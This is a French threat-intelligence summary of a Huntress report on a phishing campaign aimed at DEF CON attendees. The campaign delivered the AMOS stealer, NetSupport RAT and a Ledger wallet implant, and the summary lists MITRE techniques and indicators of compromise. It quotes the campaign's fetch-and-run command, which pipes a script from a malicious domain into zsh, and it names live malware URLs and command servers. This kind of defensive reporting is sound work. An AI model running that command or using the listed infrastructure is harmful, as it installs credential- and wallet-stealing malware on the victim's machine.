🎯 Contexte

Source : Huntress, publié le 20 août 2026. Dans les jours suivant Black Hat et DEF CON, un chercheur Huntress a été ciblé par un acteur malveillant via des messages directs sur X (Twitter), exploitant le contexte post-conférence comme prétexte social.

đŸ•”ïž Vecteur initial

Le compte X @HartmansDoeke s’est fait passer pour le VP Marketing de CoinDesk, contactant des participants Ă  DEF CON avec un prĂ©texte de planification de confĂ©rence. L’acteur a partagĂ© un Google Doc malveillant accompagnĂ© d’une « clĂ© d’accĂšs » par DM.

📄 MĂ©canisme du Google Doc

Le document exploite un Google Apps Script personnalisé (DecryptPanel.html) qui :

  • Valide un ensemble restreint de clĂ©s codĂ©es en dur
  • Collecte des informations sur la victime et l’hĂŽte
  • Rapporte l’activitĂ© via Telegram
  • PrĂ©sente des chemins d’infection distincts selon macOS ou Windows
  • Contient des commentaires en russe dans le code

La fausse « décryption » échoue intentionnellement, poussant la victime vers des instructions ClickFix ou un téléchargement manuel.

🍎 Chemin macOS

  • ClickFix : curl -fsSL https://apple-googleapi.com/i | zsh (redirige en boucle vers 127.0.0.1 au moment de l’analyse)
  • TĂ©lĂ©chargement manuel : GAPIUpdate.dmg depuis GitHub, contenant un bundle ad-hoc signĂ© contournant Gatekeeper
  • Payload : AMOS infostealer ciblant mots de passe navigateurs, cookies, wallets crypto, keychain, Telegram, Notes.app
  • Exfiltration vers http://86.54.25.213/log
  • Persistance via LaunchDaemon /Library/LaunchDaemons/com.xdivcmp.plist avec backdoor de polling et support SOCKS5

đŸȘŸ Chemin Windows (leurre 1)

  • ClickOnce : GapiUpdate.application signĂ© avec un certificat volĂ© (sociĂ©tĂ© norvĂ©gienne BARNEHAGEN GUNHILDS MINNE AS)
  • PowerShell : script chiffrĂ© tĂ©lĂ©chargeant un loader depuis https://1foqo.lat/core4
  • Payloads tĂ©lĂ©chargĂ©s : DockerDesktopSvc.exe, SteamClientHelperHost.exe, TeraCopyMonMon.exe

📩 Leurre secondaire : faux DocSend

Un second document imitant un partage Dropbox DocSend redirige vers docsend.online/download/drivers :

  • macOS → AMOS infostealer (DocSendInstaller.zip via apple.eu03hub.com)
  • Windows → DocsendInstaller.exe (Electron/NSIS, certificat Discord volĂ©)

Chaßne Windows en 3 étapes :

  1. Stage 1 : Fingerprinting hîte (HW ID, OS, CPU, GPU, BIOS, layouts clavier) → envoi à docsend.web12api.com/api/launcher/start
  2. Stage 2 : Payload JavaScript exécuté en mémoire
  3. Stage 3 : 3 payloads depuis eu03hub.com :
    • NetSupport Manager RAT (C2 : msedgewebview1.pro / msedgewebview2.pro:443, IP 87.120.104.88)
    • Proxy TLS interceptant : installe une CA racine frauduleuse (O=Google Trust Services, CN=WR3), forge un certificat pour www.virustotal.com, redirige le trafic localement
    • Implant Ledger : cible les wallets Ledger Live, polling vers eu07connect.com/api/commands/<bot_id>, persistance via clĂ© Run registry

🔗 Infrastructure

L’infrastructure suit un schĂ©ma numĂ©rotĂ© (eu03hub, eu07connect, web12api, eu02hub) suggĂ©rant une opĂ©ration plus large. Des caractĂšres cyrilliques ont Ă©tĂ© observĂ©s dans le trafic C2.

📊 Type d’article

Analyse technique dĂ©taillĂ©e d’une campagne active, publiĂ©e par Huntress Ă  des fins de documentation CTI et de partage d’IOCs.

🧠 TTPs et IOCs dĂ©tectĂ©s

TTP

  • T1566.002 — Phishing: Spearphishing Link (Initial Access)
  • T1204.002 — User Execution: Malicious File (Execution)
  • T1204.001 — User Execution: Malicious Link (Execution)
  • T1059.001 — Command and Scripting Interpreter: PowerShell (Execution)
  • T1059.002 — Command and Scripting Interpreter: AppleScript (Execution)
  • T1059.007 — Command and Scripting Interpreter: JavaScript (Execution)
  • T1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Persistence)
  • T1543.004 — Create or Modify System Process: Launch Daemon (Persistence)
  • T1553.002 — Subvert Trust Controls: Code Signing (Defense Evasion)
  • T1553.004 — Subvert Trust Controls: Install Root Certificate (Defense Evasion)
  • T1036.005 — Masquerading: Match Legitimate Name or Location (Defense Evasion)
  • T1055 — Process Injection (Defense Evasion)
  • T1090.001 — Proxy: Internal Proxy (Command and Control)
  • T1090.004 — Proxy: Domain Fronting (Command and Control)
  • T1557 — Adversary-in-the-Middle (Collection)
  • T1539 — Steal Web Session Cookie (Credential Access)
  • T1555 — Credentials from Password Stores (Credential Access)
  • T1041 — Exfiltration Over C2 Channel (Exfiltration)
  • T1571 — Non-Standard Port (Command and Control)
  • T1105 — Ingress Tool Transfer (Command and Control)
  • T1056.001 — Input Capture: Keylogging (Collection)
  • T1082 — System Information Discovery (Discovery)
  • T1614 — System Location Discovery (Discovery)

IOC

  • IPv4 : 86.54.25.213 — AbuseIPDB · VT · ThreatFox
  • IPv4 : 192.253.248.181 — AbuseIPDB · VT · ThreatFox
  • IPv4 : 87.120.104.88 — AbuseIPDB · VT · ThreatFox
  • Domaines : apple-googleapi.com — VT · URLhaus · ThreatFox
  • Domaines : gapidriver.com — VT · URLhaus · ThreatFox
  • Domaines : 1foqo.lat — VT · URLhaus · ThreatFox
  • Domaines : 2fksf.lat — VT · URLhaus · ThreatFox
  • Domaines : 3pqow.lat — VT · URLhaus · ThreatFox
  • Domaines : docsend.online — VT · URLhaus · ThreatFox
  • Domaines : docsend.web12api.com — VT · URLhaus · ThreatFox
  • Domaines : signow.web12api.com — VT · URLhaus · ThreatFox
  • Domaines : eu03hub.com — VT · URLhaus · ThreatFox
  • Domaines : apple.eu03hub.com — VT · URLhaus · ThreatFox
  • Domaines : microsoft.eu02hub.com — VT · URLhaus · ThreatFox
  • Domaines : msedgewebview1.pro — VT · URLhaus · ThreatFox
  • Domaines : msedgewebview2.pro — VT · URLhaus · ThreatFox
  • Domaines : eu07connect.com — VT · URLhaus · ThreatFox
  • Domaines : web12api.com — VT · URLhaus · ThreatFox
  • URLs : https://apple-googleapi.com/i — URLhaus
  • URLs : https://gapidriver.com/installer/GapiUpdate.application — URLhaus
  • URLs : https://1foqo.lat/core4 — URLhaus
  • URLs : https://2fksf.lat/res10.php — URLhaus
  • URLs : https://2fksf.lat/res11.php — URLhaus
  • URLs : https://3pqow.lat/res12.php — URLhaus
  • URLs : https://docsend.online/download/drivers — URLhaus
  • URLs : https://docsend.web12api.com/api/launcher/start — URLhaus
  • URLs : https://signow.web12api.com/api/launcher/start — URLhaus
  • URLs : https://eu03hub.com/get_file?file=2Ec6QYynajHw — URLhaus
  • URLs : https://eu03hub.com/get_file?file=T3YxekrHsgfaDdXY — URLhaus
  • URLs : https://eu03hub.com/get_file?file=qV06ev1a1pOY — URLhaus
  • URLs : https://eu07connect.com/api/commands/ — URLhaus
  • URLs : http://86.54.25.213/log — URLhaus
  • URLs : http://192.253.248.181/api/v1/getscpt/ — URLhaus
  • SHA256 : 15afe14b5db2896d35a0c4f3139db85158da120fa90613c975c88f10bbbcc420 — VT · MalwareBazaar
  • MD5 : 8ca79bd95f73a7f984b95e487dc1552b — VT · MalwareBazaar
  • MD5 : 281f1d9e0638517ac90d61e47fd8be60 — VT · MalwareBazaar
  • MD5 : 6dd77235aaa99153ad790b5e59b49372 — VT · MalwareBazaar
  • MD5 : f4769ba9e8065727ef26cca72e894f83 — VT · MalwareBazaar
  • MD5 : cd08e22dbfe032d15b54217f4f4ed350 — VT · MalwareBazaar
  • Fichiers : GAPIUpdate.dmg
  • Fichiers : GapiUpdate.application
  • Fichiers : DocsendInstaller.exe
  • Fichiers : DocSendInstaller.zip
  • Fichiers : Manager.msi
  • Fichiers : Localcertificate.exe
  • Fichiers : Asusdriverld.exe
  • Fichiers : DockerDesktopSvc.exe
  • Fichiers : SteamClientHelperHost.exe
  • Fichiers : TeraCopyMonMon.exe
  • Fichiers : com.xdivcmp.plist
  • Fichiers : nskbfltr.sys
  • Fichiers : sys.ps1
  • Chemins : /tmp/lksopo
  • Chemins : /Library/LaunchDaemons/com.xdivcmp.plist
  • Chemins : C:\Windows\system32\drivers\nskbfltr.sys
  • Chemins : C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MsBuild.exe
  • Chemins : %LOCALAPPDATA%\Microsoft\Windows\UpdateCache
  • Chemins : %APPDATA%\Ledger Live\app.crc32
  • Chemins : ~/.phost
  • Chemins : ~/.bhost
  • Chemins : ~/.username
  • Chemins : ~/.botid
  • Chemins : ~/.pwd
  • Chemins : ~/.uninstalled
  • Chemins : ~/.lastaction

⚠ À propos de ces IOC — ils sont extraits automatiquement de l’article original le 20 aoĂ»t 2026 et n’ont pas fait l’objet d’une vĂ©rification externe. Un indicateur peut avoir Ă©tĂ© rĂ©attribuĂ© depuis : une IP de C2 peut redevenir un service lĂ©gitime, un domaine sinkholĂ© peut changer de propriĂ©taire. Aucune garantie d’exactitude ni d’actualitĂ© — contrĂŽlez leur validitĂ© avant tout usage opĂ©rationnel, en particulier avant de les injecter dans une blocklist ou un SIEM.

Malware / Outils

  • AMOS (stealer)
  • NetSupport RAT (rat)
  • Sleestak (loader)
  • GAPIUpdate (loader)
  • DocsendInstaller (loader)

🟱 Indice de vĂ©rification factuelle : 90/100 (haute)

  • ✅ huntress.com — source reconnue (liste interne) (20pts)
  • ✅ 27796 chars — texte complet (fulltext extrait) (15pts)
  • ✅ 65 IOCs dont des hashes (15pts)
  • ✅ 5/10 IOCs confirmĂ©s (AbuseIPDB, MalwareBazaar, ThreatFox, URLhaus, VirusTotal) (15pts)
  • ✅ 23 TTPs MITRE identifiĂ©es (15pts)
  • ✅ date extraite du HTML source (10pts)
  • ⬜ aucun acteur de menace nommĂ© (0pts)
  • ⬜ pas de CVE Ă  vĂ©rifier (0pts)

IOCs confirmés externellement :

  • 86.54.25.213 (ip) → VT (8/91 dĂ©tections)
  • 192.253.248.181 (ip) → VT (16/91 dĂ©tections) + ThreatFox (Odyssey Stealer)
  • 87.120.104.88 (ip) → VT (14/91 dĂ©tections) + ThreatFox (NetSupportManager RAT)
  • apple-googleapi.com (domain) → VT (3/91 dĂ©tections)
  • 1foqo.lat (domain) → VT (5/91 dĂ©tections)

🔗 Source originale : https://www.huntress.com/blog/defcon-phishing-google-doc-malware